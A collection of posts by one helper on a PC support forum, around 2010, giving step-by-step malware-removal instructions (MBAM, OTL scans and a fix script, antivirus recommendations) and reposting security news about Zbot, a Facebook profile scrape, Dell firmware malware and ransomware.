Starbuck

Hi Jim, Don't worry too much about that. Files Infected: C:\Program Files (x86)\Trend Micro\HijackThis\backups\backup-20100122-120940-917-rarype32.exe (Trojan.Bredolab) -> Quarantined and deleted successfully. It's just something MBAM found in your Hjt backups. If you are referring to the extra.txt .... have a look here: C:\Users\Helen\Desktop There was a slight problem with the main OTL report as it didn't show the 'custom scans' Please run OTL again. this time copy the lines in bold below: netsvcs msconfig %SYSTEMDRIVE%\*.exe /md5start eventlog.dll scecli.dll netlogon.dll cngaudit.dll sceclt.dll ntelogon.dll logevent.dll iaStor.sys nvstor.sys atapi.sys IdeChnDr.sys viasraid.sys AGP440.sys vaxscsi.sys nvatabus.sys viamraid.sys nvata.sys nvgts.sys iastorv.sys ViPrt.sys eNetHook.dll ahcix86.sys KR10N.sys nvstor32.sys ahcix86s.sys nvrd32.sys symmpi.sys adp3132.sys /md5stop %systemroot%\*. /mp /s %systemroot%\system32\*.dll /lockedfiles %systemroot%\Tasks\*.job /lockedfiles %systemroot%\system32\drivers\*.sys /lockedfiles CREATERESTOREPOINT right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste. http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png . Click the Run Scan button. http://img.photobucket.com/albums/v708/starbuck50/runscan.png Do not change any settings unless otherwise told to do so. The scan wont take long. This scan will only produce the main.txt. Please post that along with the extras.txt found at: C:\Users\Helen\Desktop Thanks

Hi mij, Glad to hear you had a bit of success with the problem. Still post the: MBAM scan report and both reports from OTL and i'll take a look and see if there's any leftovers on the system for you. I like that term, sounds good

Pirates beware. Security researchers from antivirus vendor Webroot Software warn that malware pushers are targeting StarCraft II pirates. A variant of the Zbot trojan is distributed on torrent and warez sites as a custom loader for the highly anticipated game. StarCraft II: Wings of Liberty is the sequel to one of the best-selling PC games in history. After being in development since as early as 2003, the new installment was one of the most anticipated games of the past several years. StarCraft II was officially released on Tuesday, 27 July 2010 and resulted in a real frenzy amongst avid gamers, who rushed to grab an early copy. However, as it all too familiar these days, not everyone is willing to pay in order to play the game and many would rather illegally download it off the Internet. “Apparently, there are a flood of torrents where gamers can download purportedly pirated versions of SC2. While your less ethical gamer might cheer this news, you might be less pleased to find out that some of the SC2 torrents appear to bring along a side order of malware,” Andrew Brandt, a threat researcher at Webroot, warns. One such example is a new variant of the notorious ZeuS trojan, which is being touted as a StarCraft II: Wings of Liberty loader. Game loaders are custom pieces of software, which are used to bypass various DRM protections and allow non-genuine copies to run. ZeuS, also known as Zbot, is an information stealing trojan, that is commonly used by cyber crooks to steal online banking accounts, credit card details and other credentials. The malware is one of the primary tools used to perform bank fraud over the Internet. Source: Zbot Variant Distributed as StarCarft II Game Loader - Pirates beware - Softpedia

Hi mij, Have you tried to access the internet using 'safe mode with networking'? If it will connect that way.... try and download the programs that 'plastic nev' asked for directly to the infected system.

You may well be right there. I've always thought the main problem is..... People can just buy a computer and get on the net without any problem. Most probably have no idea on PC security or Privacy. It's a shame that everyone isn't made to complete a course before being allowed to run lose.

One hundred million Facebook user profiles containing personal information such as e-mail addresses and phone numbers, are now available as a 2.8GB torrent download. Ron Bowes of Skull Security created the torrent using a Web crawler program, harvesting data from public profiles of users who have chosen not to change their privacy settings. The file contains information for 1 in every 5 Facebook users, all those who are currently listed in the Facebook open access directory. Nothing is illegal about the torrent, because it simply uses data that is available to the public. Even those who have secured their own Facebook page may not be completely out of the clear. In a statement on his website Bowes said: "...this is a scary privacy issue. I can find the name of pretty much every person on Facebook...Once I have the name and URL of a user, I can view, by default, their picture, friends, information about them, and some other details. If the user has set their privacy higher, at the very least I can view their name and picture. So, if any searchable user has friends that are non-searchable, those friends just opted into being searched, like it or not! " Privacy is a huge concern for many Facebook users, and has put the social networking site in the news over and over again. While Facebook does have quite a few privacy options in place, it often makes understanding and finding those options as an individual user fairly complex. The process of making your Facebook profile unsearchable requires going through numerous different menu pages, a process that might frustrate some users into just not doing it at all. What about you? Have you made your profile unsearchable on Facebook, or are you comfortable with having your information included in the torrent file? Source: 100M Facebook Profiles Now Available For Download

Let's find out if it's something that's been added to the browsers. Try running IE and Firefox without any addons and see if the problem still occurs. Internet Explorer: Click on Start >> All Programs >> Accessories >> System Tools >> Internet Explorer (no Add-ons). This opens up IE without ActiveX controls and browser extensions. Firefox: Click on Start >> All Programs >> Mozilla Firefox >> Mozilla Firefox (safe mode)

Hi dazzac, I've had a bit more time to go over all the reports and posts again. Seems there's nothing to worry about. it's actually a legit marketing site. awin1.com | McAfee SiteAdvisor Software – Website Safety Ratings and Secure Search Affiliate Marketing – Affiliate Window – Affiliate Network Affiliate Marketing – Affiliate Window – Affiliate Network Seems the shopping sites may be using this company for market research purposes. Obviously you have something installed on this system which you don't on the other system. What is this program in your uninstall list: MarketResearch I can't find any info on it. Perfectly legit. it's there to actually protect you. quote taken from: Opera Web Browser | Security also see here: Netcraft Anti-Phishing Toolbar toolbar.netcraft.com | WOT Reputation Scorecard | WOT Web of Trust I'd say if you do use these shopping sites frequently .... you are going to see these things.

Hi John, Sorry for the delay. Ok, let's try and get some idea of what's going on. Step 1 Download TFC by OldTimer to your desktop Please double-click TFC.exe to run it. (Note: If you are running on Vista, right-click on the file and choose Run As Administrator). It will close all programs when run, so make sure you have saved all your work before you begin. Click the Start button to begin the process. Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two. Let it run uninterrupted to completion. Once it's finished it should reboot your machine. If it does not, please manually reboot the machine yourself to ensure a complete clean. Step 2 Please download Malwarebytes Anti-Malware and save it to your desktop. Make sure you are connected to the Internet. Double-click on Download_mbam-setup.exe to install the application. When the installation begins, follow the prompts and do not make any changes to default settings. When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-Malware Launch Malwarebytes' Anti-Malware [*]Then click Finish. [*]MBAM will automatically start and you will be asked to update the program before performing a scan. If an update is found, the program will automatically update itself. Press the OK button to close that box and continue. If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install. [*]On the Scanner tab: Make sure the "Perform Full Scan" option is selected. Then click on the Scan button. [*]If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button. [*]The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient. [*]When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found". [*]Click OK to close the message box and continue with the removal process. [*]Back at the main Scanner screen, click on the Show Results button to see a list of any malware that was found. [*]Make sure that everything is checked, and click Remove Selected. [*]When removal is completed, a log report will open in Notepad and you may be prompted to restart your computer. (see Note below) [*]The log is automatically saved and can be viewed by clicking the Logs tab in MBAM. [*]Copy and paste the contents of that report in your next reply and exit MBAM. Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts. Click OK to either and let MBAM proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot will prevent MBAM from removing all the malware. Step 3 Download OTL to your desktop. Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted. When the window appears, underneath Output at the top change it to Minimal Output. Check the boxes beside LOP Check and Purity Check. . http://img.photobucket.com/albums/v708/starbuck50/new/newOtl2.png Now copy the lines in the codebox below. netsvcs msconfig %SYSTEMDRIVE%\*.exe /md5start eventlog.dll scecli.dll netlogon.dll cngaudit.dll sceclt.dll ntelogon.dll logevent.dll iaStor.sys nvstor.sys atapi.sys IdeChnDr.sys viasraid.sys AGP440.sys vaxscsi.sys nvatabus.sys viamraid.sys nvata.sys nvgts.sys iastorv.sys ViPrt.sys eNetHook.dll ahcix86.sys KR10N.sys nvstor32.sys ahcix86s.sys nvrd32.sys symmpi.sys adp3132.sys /md5stop %systemroot%\*. /mp /s %systemroot%\system32\*.dll /lockedfiles %systemroot%\Tasks\*.job /lockedfiles %systemroot%\system32\drivers\*.sys /lockedfiles CREATERESTOREPOINT right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste. http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png . Click the Run Scan button. http://img.photobucket.com/albums/v708/starbuck50/runscan.png Do not change any settings unless otherwise told to do so. The scan wont take long. When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL. Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply. In your next reply, please submit: MBAM scan report Both reports from OTL If the reports are too big to post here, add them as attachments Thanks.

Hi clucky, Looks like you have a little work to do. ;) Step 1 Click on start... control panel and double-click on Add or Remove Programs. From within Add or Remove Programs uninstall the following: J2SE Runtime Environment 5.0 Update 3 Java™ SE Runtime Environment 6 Java™ 6 Update 3 Java 2 Runtime Environment, SE v1.4.2_03 These are old versions which should have been removed when Java was updated. Do not remove: Java™ 6 Update 11 for the time being. Reboot your system when completed. Step 2 Double click on OTL.exe to run it. Copy the lines in the codebox below. (make sure that :Otl is on the first line ) :Otl O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found. O4 - HKCU..\Run: [{30689C70-3B29-5DD6-2DB0-B2931B8E5205}] C:\Documents and Settings\Administrator.JENNIFER.000\Application Data\Qaohf\uliri.exe (Uszil Uxzngel Krqunp) O9 - Extra Button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Jennifer Hayden\Start Menu\Programs\IMVU\Run IMVU.lnk File not found [2010/07/20 19:59:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Administrator.JENNIFER.000\Application Data\Ekxyo [2010/07/20 05:45:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Administrator.JENNIFER.000\Application Data\Qaohf [2010/07/19 20:37:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\NetworkService\Local Settings\Application Data\atbbpfdcu @Alternate Data Stream - 128 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:2B99FE60 @Alternate Data Stream - 118 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:375A40C3 @Alternate Data Stream - 100 bytes -> C:\Documents and Settings\All Users\Application Data\TEMP:5D10517E :commands [emptytemp] [purity] [RESETHOSTS] [EMPTYFLASH] Return to OTL, right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste. http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png Click the red Run Fix button. http://img.photobucket.com/albums/v708/starbuck50/runfixbutton.png OTL will reboot your system once the fix has completed. After the reboot, you may need to double click OTL to launch the program and retrieve the log. Copy and paste the contents of the OTL log that comes up after the fix in your next reply. if you lose the report, there will be a copy here: C:\_OTL\MovedFiles Step 3 You are missing one important program on that computer: An antivirus. This is somewhat suicidal in today's digital world. You need to install an antivirus program as soon as you can and run a complete scan of the computer: Avira AntiVir Avast free MS Security Essentials ... see note* Install one of these, update the definitions and then run a full scan. Let it quarantine/delete anything it finds. Let me know if there is anything that it reports but can not remove. Note*: Upon installation MS Security Essentials will check that your OS is a legal copy. In your next reply, please submit: Otl fix report and let me know if the Anti Virus scan found/removed anything Thanks.

Hi clucky, It's ok i have enough information. Give me time to go through the reports and i'll get back to you ASAP.

My system originally came with a 250w PSU, i removed this and added a 450w PSU. Like Match says, as long as the connectors fit (and most will) it will cause no harm at all. It's like taking a 1.0l car engine out and adding a 2.0l one. The extra power is there if you need it, but if you don't need it .... it won't work overtime.

Hi clucky, Sorry for the late response. Just one point i'd like to make: If you think you have malware Never turn off your restore points. Even a bad restore point is better than no restore point. If you don't use system restore.... the bad restore points won't make any difference to you. We always clean them at the end of the cleaning process anyway. Without it, i'm out of a job ... so keep it coming http://fc06.deviantart.com/fs4/i/2004/250/7/1/ROFL_by_b4sti.gif Ok, let's get to the bottom of this: Step 1 Please download exeHelper to your desktop. If your AV program throws up a warning about the program, ignore the warning. Some AV's flag this program because of how it works... that's all. Double-click on exeHelper.com to run the fix. A black window should pop up, press any key to close once the fix is completed. Post the contents of exehelperlog.txt ( Will be created in the directory where you ran exeHelper.com and should open at the end of the scan) Note : If the window shows a message that says "Error deleting file", please re-run the program before posting a log - and post the two logs together ( they will both be in the one file ). Step 2 Download OTL to your desktop. right click on the link and select 'Save Link/Target As'. if you have problems, try this download link: OTL Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted. When the window appears, underneath Output at the top change it to Minimal Output. Check the boxes beside LOP Check and Purity Check. . http://img.photobucket.com/albums/v708/starbuck50/new/newOtl2.png Now copy the lines in bold below. netsvcs msconfig %SYSTEMDRIVE%\*.exe /md5start eventlog.dll scecli.dll netlogon.dll cngaudit.dll sceclt.dll ntelogon.dll logevent.dll iaStor.sys nvstor.sys atapi.sys IdeChnDr.sys viasraid.sys AGP440.sys vaxscsi.sys nvatabus.sys viamraid.sys nvata.sys nvgts.sys iastorv.sys ViPrt.sys eNetHook.dll ahcix86.sys KR10N.sys nvstor32.sys ahcix86s.sys nvrd32.sys symmpi.sys adp3132.sys /md5stop %systemroot%\*. /mp /s %systemroot%\system32\*.dll /lockedfiles %systemroot%\Tasks\*.job /lockedfiles %systemroot%\system32\drivers\*.sys /lockedfiles CREATERESTOREPOINT right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste. http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png . Click the Run Scan button. http://img.photobucket.com/albums/v708/starbuck50/runscan.png Do not change any settings unless otherwise told to do so. The scan wont take long. When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL. Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply. In your next reply, please submit: exehelperlog.txt and both reports from OTL If the reports are too big to post, add them as attachments. Thanks.

I know a few malware removal teachers that would love to get there systems that infected. http://fc06.deviantart.com/fs4/i/2004/250/7/1/ROFL_by_b4sti.gif Seriously though, it does look as though security had been lacking for awhile on your system. Sometimes when people have to reinstall the OS, they ask what they should have in the way of security. This is what i normally say to them: To find out how you may have been infected....read this topic: So how did i get infected? A good Anti-Virus protector: Here's a few good 'free' programs. Avira AntiVir Avast free MS Security Essentials ... see note* Only install one of these. Note*: Upon installation MS Security Essentials will check that your OS is a legal copy. A 3rd party Firewall: Some free firewalls are: Online Armor Free Outpost Firewall Free Sunbelt Personal Firewall Only install one of these Firewalls. A resident Anti-Malware scanner: Installing Windows Defender and activating it's 'Realtime Protection' will help to keep the nasties away. Scan regularly with a 'Stand Alone' Anti-Malware scanner: Installing another scanner that you can run once or twice a week is always beneficial. Something like: Malwarebytes Anti-Malware SUPERAntiSypware Remember to update these programs each time before running. You can install more than one of these if you only run them as stand alone programs. Install SpywareBlaster - SpywareBlaster will add a large list of programs and sites into your Internet Explorer settings that will protect you from running and downloading known malicious programs. A tutorial on installing & using this product can be found here: Using and installing SpywareBlaster Keep your system clean of temp files etc, using a 'Cleaner': Cleaners are programs that will help to clean out your: Windows temp files Current user temp files Cookies Temporary Internet flies Browser history Recycle bin Etc....... In other words.... all the crap that you accumalate over the course of your browsing and day to day usage of your pc. Programs like: TFC by OldTimer CCleaner ATF Cleaner Obviously this is not a complete list of programs available, plus i've stuck to 'Free' programs. If you want 'Paid for' programs... you will have a greater choice. Hope this gives you some idea. a bit late in the day, but: Safe surfing. http://fc08.deviantart.net/fs71/f/2010/033/b/3/Computer_addict__by_Sinister_Starfeesh.gif

Hi there and welcome ExtremeTech.support - Free PC Help I've moved your thread here as this is the correct place to get the help you need. Ok, let's see what we can do about this. Step 1 Please download exeHelper to your desktop. If your AV program throws up a warning about the program, ignore the warning. Some AV's flag this program because of how it works... that's all. Double-click on exeHelper.com to run the fix. A black window should pop up, press any key to close once the fix is completed. Post the contents of exehelperlog.txt ( Will be created in the directory where you ran exeHelper.com and should open at the end of the scan) Note : If the window shows a message that says "Error deleting file", please re-run the program before posting a log - and post the two logs together ( they will both be in the one file ). Step 2 Download OTL to your desktop. right click on the link and select 'Save Link/Target As'. if you have problems, try this download link: OTL Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted. When the window appears, underneath Output at the top change it to Minimal Output. Check the boxes beside LOP Check and Purity Check. . http://img.photobucket.com/albums/v708/starbuck50/new/newOtl2.png Now copy the lines in bold below. netsvcs msconfig %SYSTEMDRIVE%*.exe /md5start eventlog.dll scecli.dll netlogon.dll cngaudit.dll sceclt.dll ntelogon.dll logevent.dll iaStor.sys nvstor.sys atapi.sys IdeChnDr.sys viasraid.sys AGP440.sys vaxscsi.sys nvatabus.sys viamraid.sys nvata.sys nvgts.sys iastorv.sys ViPrt.sys eNetHook.dll ahcix86.sys KR10N.sys nvstor32.sys ahcix86s.sys nvrd32.sys symmpi.sys adp3132.sys /md5stop %systemroot%*. /mp /s %systemroot%system32*.dll /lockedfiles %systemroot%Tasks*.job /lockedfiles %systemroot%system32drivers*.sys /lockedfiles CREATERESTOREPOINT right click in the Custom Scans/Fixes window (under the blue bar) and choose Paste. http://img.photobucket.com/albums/v708/starbuck50/new%20forum/scan-fix.png . Click the Run Scan button. http://img.photobucket.com/albums/v708/starbuck50/runscan.png Do not change any settings unless otherwise told to do so. The scan wont take long. When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL. Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them with your next reply. In your next reply, please submit: exehelperlog.txt and both reports from OTL. If the reports are too big to post here, add then as attachments. Thanks.

Hi atwitsend, There's no nice way to say this but..... your system is a lost cause. That's the best collection of malware i've ever seen on a system. I started to list out the actual malware infections.... but i lost count. There are multiple backdoor trojans, plus even your legit programs have been infected. The version of MBAM you ran was way out of date. In fact it's been updated 287 times since you last updated it. Your personal details will have been severely compromised. So if you do any form of online banking, use of credit cards etc.... inform these companies straight away and change all passwords..... do this from a malware free system. Your version of XP was well out of date as well. So you were missing loads of security updates. It's time for a reformat/reinstall i'm afraid. But i think you had already guessed that.

Hi, it would also help enormously if you could post the MBAM report. It may have removed something by mistake. Start Malwarebytes AntiMalware. Click on the logs tab. The logs are date stamped ... double click on the log that showed the infection items. It'll open in notepad. Can you copy this to another system so you can post it here along with the answers to KenB's questions. Thanks

Company says some PowerEdge R410 machines at risk. Dell has confirmed that some of its PowerEdge R410 servers have been shipping with malware preinstalled on the motherboard. The malware is in a section of the server motherboard's firmware, according to reports, and is an unidentified spying application. Dell said that the problem does not harm servers running non-Windows operating systems, and is not an issue with new systems shipped directly from the manufacturer. "We have identified a potential issue with our service motherboard stock, and are taking preventative action with our customers accordingly," said the company in a community forum post. "The potential issue involves a small number of PowerEdge server motherboards sent out through service dispatches that may contain malware. This malware code has been detected on the embedded server management firmware." Dell said that it will contact the small number of customers with infected motherboards and send round engineers to rectify the problem. Malware embedded in this way would be undetectable to traditional security software. and could pose a major threat. Source: Dell warns of malware-infected server motherboards - V3.co.uk - formerly vnunet.com

http://fc06.deviantart.net/fs27/f/2008/184/4/2/Happy_Birthday_Flag_by_Chaosbrazer.gif schrauber Don't party too hard. http://fc02.deviantart.net/fs25/f/2008/125/8/7/PARTY_by_Hipityhop.png

Leads users to a survey scam. A new Facebook spam campaign is using a Coca Cola horrific video lure to trick users into visiting a malicious page. Victims are encouraged to propagate the rogue messages and end up with their personal information stolen. “I am part of the 98.0% of people that are NEVER gonna drink Coca Cola again after this HORRIFIC video ? Find out the TRUTH about Coke!!!” the spam reads. This can be added in various places, for example as a NewsFeed entry or even a Calendar event. Clicking on the link takes users to an external site displaying an image mimicking an embedded video player. However, instructions on the page reveal that the video can only be played if the user agrees to spread the news about it on Facebook. This is allegedly done in three steps. The first requires the user to “Like” the page. Judging by the number displayed next to the Like button, over 19,000 people have fallen for this scam so far. The second requirement is to “Share” the link on Facebook, while the third step asks the user to copy and paste the spam message cited above for seven times on Facebook. “The page claims to poll whether you have shared the link enough (in order to allow the video to be viewed). But when you realise you're not making any progress - despite your valiant attempts to recommend the link to all and sundry - you might hit the link which says: >>>Cant Be Botherd To Wait? --> Click Here To Skip This<<<. And this link takes you to a survey which asks you for all sorts of personal information,” Graham Cluley, senior technology consultant at Sophos, warns. While this scam relies on social engineering tricks to convince Facebook users to liking the page, there are methods to achieve the same result without their permission. Just yesterday, we reported a clickjacking vulnerability, which could be exploited to do exactly that in a manner that is completely transparent to users. Source: http://news.softpedia.com/news/Coca-Cola-Shocking-Video-Spam-Spreading-on-Facebook-147778.shtml

Locks down computers and asks for mobile credit recharge. A new piece of ransomware is currently circulating in the wild and prevents victims from properly using their computers. The malicious program also displays obscene messages in an attempt to force users to recharge a mobile phone account. Ransomware is a term used to refer to computer trojans which disable critical system functionality and ask for a ransom in order to restore it. The crimeware model is seen by many security experts as the next step in the evolution of scareware, programs which scare users into paying unnecessary license fees. “In this case, the Trojan (which we and several other AV companies call Trojan-Ransom-Krotten) thoroughly locks down the infected system then demands payment—in the form of credit paid to the Ukrainian mobile phone provider Kyivstar, which the victim then has to transfer to the malware distributor’s account,” explains Andrew Brandt, a security researcher at security vendor Webroot, who analyzed the malicious program. According to the malware analyst the trojan installer is called chatadmin.exe and was created with Sign 0f Misery (S0M), a tool for people who lack the programming skills necessary to create applications. Once executed on the system, the installer performs several checks, drops the payload and forces a reboot. The system is locked down by modifying around fourty registry entries, which are normally intended for system administrators. The affect the users' ability to run most applications, open many files type, close opened windows or access the Start menu. The trojan also replaces the time in the system tray with a Russian curse word and adds an obscene message to the Internet Explorer title bar. Every time an infected computer reboots the user is prompted with instructions to send a mobile credit recharge code for 30 Grivna (close to $4) to an email address. The message claims that people who comply with the request will receive a program that can be used to release their computer. In order to protect themselves against this threat users should run an up-to-date and capable antivirus product. According to the Webroot researcher, the trojan installer will halt the infection process and quit if a file called 290564175.txt is located in the root of the C: drive. Source: Obscene Ukrainian Ransomware in the Wild - Locks down computers and asks for mobile credit recharge - Softpedia

http://fc06.deviantart.com/fs27/f/2008/184/4/2/Happy_Birthday_Flag_by_Chaosbrazer.gif PseFrank Hope your day has been a good one. http://fc07.deviantart.com/images3/i/2004/146/9/1/Two_thumbs_up.gif

Hi Dazzac, No problem at all. It may well be ok now, the CF scan is a double check just to make sure. Best to be safe than sorry. :)

Attached HTML files redirect to malicious websites. A new email spam campaign spreads emails masquerading as payment requests coming from eBay. Users are lured into opening an attached HTML file which redirects them to a malware pushing website. The rogue email messages have a subject of “Payment request from.” This is most likely a spelling mistake, the spammers probably intending to write “payment request form.” This is suggested by the fact that the attached HTML file is called form.html. There is no message contained in the body, but the “From” field is forged to appear as if the emails were sent from a eBay@reply1.ebay.com address. “Of course it's a sneaky piece of social engineering on the behalf of the hackers. Many people would be tempted to open the attachment to find out what on earth the email is about. And opening the attachment (which Sophos detects as Troj/JSRedir-BV) redirects your web browser to a recently compromised webpage on a legitimate site infected with Mal/Iframe-Q,” Graham Cluley, senior technology consultant at Sophos, writes. In fact there are two parts to this attack. First, a redirect takes users to a common Canadian Pharmacy spam site, tricking them into believing that nothing truly dangerous happened. However, in the background a rogue IFrame loads a malicious script from a third party website. This code has the purpose of silently downloading and executing a piece of malware onto the visitors' computers. Such attacks are known as drive-by-downloads and this particular one is used to push a Zbot variant. Zbot, or ZeuS, is a computer trojan commonly used to steal online banking credentials and other financial information. It is the weapon of choice for fraudsters looking to siphon money out of the bank accounts of individuals, companies and organizations everywhere. Source: Fake eBay Payment Request Emails Lead to Malware - Attached HTML files redirect to malicious websites - Softpedia

Hi HiM, That was a fair chunck of rubbish ;) Sounds like the system is running normal again..... but let's double check everything before we finish off. Please update MBAM and run another scan: Start MBAM Click on the Update tab http://img.photobucket.com/albums/v708/starbuck50/mbam1.png Click Check for Updates http://img.photobucket.com/albums/v708/starbuck50/mbam2.png If it says that MBAM needs to close to update it... let it close and then restart. Then click the Scan button. Don't forget: Please copy and paste the report here for me. Thanks